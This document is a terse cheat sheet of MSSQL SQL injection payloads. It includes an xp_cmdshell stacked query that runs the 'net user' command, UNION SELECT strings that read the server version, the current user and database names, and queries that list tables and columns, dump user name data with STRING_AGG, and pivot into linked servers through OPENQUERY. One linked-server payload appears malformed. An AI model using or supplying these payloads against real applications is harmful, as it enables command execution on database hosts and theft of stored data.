MSSQL

Standard

-- XP_CMDSHELL
Query: 00') EXEC xp_cmdshell 'net user'-- -

UNION

-- RANDOM
--- Version
Query: 00') UNION SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

--- User
Query: 00') UNION SELECT NULL,NULL,NULL,user,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

--- Databases (N = 0, 1, 2, 3, 4, ...; increment N to enumerate each database name)
Query: 00') UNION SELECT NULL,NULL,NULL,DB_NAME(N),NULL,NULL,NULL,NULL,NULL,NULL,NULL -- -

------------------------

-- DATABASE INFORMATION
--- LIST TABLES
Query: 00') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables -- -
Query: 00') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_catalog = 'TEST_DB'-- -
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(table_name,'|') FROM (SELECT table_name FROM information_schema.tables WHERE table_type='BASE TABLE' ORDER BY table_name OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Query: 00') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_catalog = 'TEST_DB' OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY-- -

-- LIST COLUMNS
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(column_name,'|') FROM (SELECT column_name FROM information_schema.columns WHERE table_name='POC_Test' ORDER BY table_name OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

-- DUMP CONTENT FROM COLUMN
--- SINGLE COLUMN
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(UserName,'|') FROM (SELECT UserName FROM POC_Test ORDER BY UserName OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

--- MULTIPLE COLUMNS
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(CONCAT_WS(',',NameID,UserName),'|') FROM (SELECT NameID,UserName FROM POC_Test ORDER BY NameID OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

------------------------

-- LINKED DATABASES
--- LIST COLUMNS
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT CAST(v AS NVARCHAR(MAX)) FROM OPENQUERY(<HOSTNAME>,'SELECT column_name FROM information_schema.columns WHERE table_name=''TEST_TABLE'' AS v')),NULL
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(column_name,'|') FROM OPENQUERY(<HOSTNAME>,'SELECT column_name FROM information_schema.columns WHERE table_name=''test_table'' ORDER BY table_name OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
